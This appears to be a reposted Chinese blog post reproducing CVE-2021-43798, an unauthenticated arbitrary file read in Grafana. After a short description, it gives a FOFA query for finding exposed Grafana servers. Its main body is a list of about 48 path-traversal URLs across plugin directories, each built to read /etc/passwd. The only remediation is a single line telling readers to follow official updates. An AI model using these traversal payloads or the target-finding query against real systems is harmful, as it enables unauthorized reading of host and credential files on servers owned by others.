碼上歡樂
相關內容    簡體    繁體

Grafana 未授權任意文件讀取漏洞

本文轉載自   查看原文   2021-12-08 20:07   2561    漏洞復現

漏洞原理:

  Grafana是一個跨平台、開源的數據可視化網絡應用程序平台。用戶配置連接的數據源之后,Grafana可以在網絡瀏覽器里顯示數據圖表和警告。Grafana 存在未授權任意文件讀取漏洞,攻擊者在未經身份驗證的情況下可通過該漏洞讀取主機上的任意文件。

CVE編號:

  CVE-2021-43798

fofa語法:

  app="Grafana"

影響范圍:

   Grafana v8.2.6

漏洞復現:

 

因為不知道Grafana安裝了什么插件需要模糊測試:

/ public /plugins/alertGroups/../../../../../../../../etc/passwd
/ public /plugins/alertlist/../../../../../../../../etc/passwd
/ public /plugins/alertmanager/../../../../../../../../etc/passwd
/ public /plugins/annolist/../../../../../../../../etc/passwd
/ public /plugins/barchart/../../../../../../../../etc/passwd
/ public /plugins/bargauge/../../../../../../../../etc/passwd
/ public /plugins/canvas/../../../../../../../../etc/passwd
/ public /plugins/cloudwatch/../../../../../../../../etc/passwd
/ public /plugins/dashboard/../../../../../../../../etc/passwd
/ public /plugins/dashlist/../../../../../../../../etc/passwd
/ public /plugins/debug/../../../../../../../../etc/passwd
/ public /plugins/elasticsearch/../../../../../../../../etc/passwd
/ public /plugins/gauge/../../../../../../../../etc/passwd
/ public /plugins/geomap/../../../../../../../../etc/passwd
/ public /plugins/gettingstarted/../../../../../../../../etc/passwd
/ public /plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/ public /plugins/grafana/../../../../../../../../etc/passwd
/ public /plugins/graph/../../../../../../../../etc/passwd
/ public /plugins/graphite/../../../../../../../../etc/passwd
/ public /plugins/heatmap/../../../../../../../../etc/passwd
/ public /plugins/histogram/../../../../../../../../etc/passwd
/ public /plugins/influxdb/../../../../../../../../etc/passwd
/ public /plugins/jaeger/../../../../../../../../etc/passwd
/ public /plugins/live/../../../../../../../../etc/passwd
/ public /plugins/logs/../../../../../../../../etc/passwd
/ public /plugins/loki/../../../../../../../../etc/passwd
/ public /plugins/mixed/../../../../../../../../etc/passwd
/ public /plugins/mssql/../../../../../../../../etc/passwd
/ public /plugins/mysql/../../../../../../../../etc/passwd
/ public /plugins/news/../../../../../../../../etc/passwd
/ public /plugins/nodeGraph/../../../../../../../../etc/passwd
/ public /plugins/opentsdb/../../../../../../../../etc/passwd
/ public /plugins/piechart/../../../../../../../../etc/passwd
/ public /plugins/pluginlist/../../../../../../../../etc/passwd
/ public /plugins/postgres/../../../../../../../../etc/passwd
/ public /plugins/prometheus/../../../../../../../../etc/passwd
/ public /plugins/stat/../../../../../../../../etc/passwd
/ public /plugins/state-timeline/../../../../../../../../etc/passwd
/ public /plugins/status-history/../../../../../../../../etc/passwd
/ public /plugins/ table -old/../../../../../../../../etc/passwd
/ public /plugins/ table /../../../../../../../../etc/passwd
/ public /plugins/tempo/../../../../../../../../etc/passwd
/ public /plugins/testdata/../../../../../../../../etc/passwd
/ public /plugins/text/../../../../../../../../etc/passwd
/ public /plugins/timeseries/../../../../../../../../etc/passwd
/ public /plugins/welcome/../../../../../../../../etc/passwd
/ public /plugins/xychart/../../../../../../../../etc/passwd
/ public /plugins/zipkin/../../../../../../../../etc/passwd

修復建議:

  關注https://grafana.com/ 官方更新。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Grafana 未授權任意文件讀取漏洞 Goby && Grafana未授權任意文件讀取 0day ThinkAdminV6未授權列目錄、任意文件讀取漏洞復現 【漏洞復現】Vmware vcenter未授權任意文件RCE Grafana 任意文件讀取漏洞(CVE-2021-43798) 【漏洞復現】ThinkAdmin v5和v6 未授權列目錄任意文件讀取(CVE-2020-25540) 通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現 通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現 CVE-2021-21972 Vmware vcenter未授權任意文件漏洞分析 Grafana 任意文件讀取漏洞 (CVE-2021-43798)學習
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM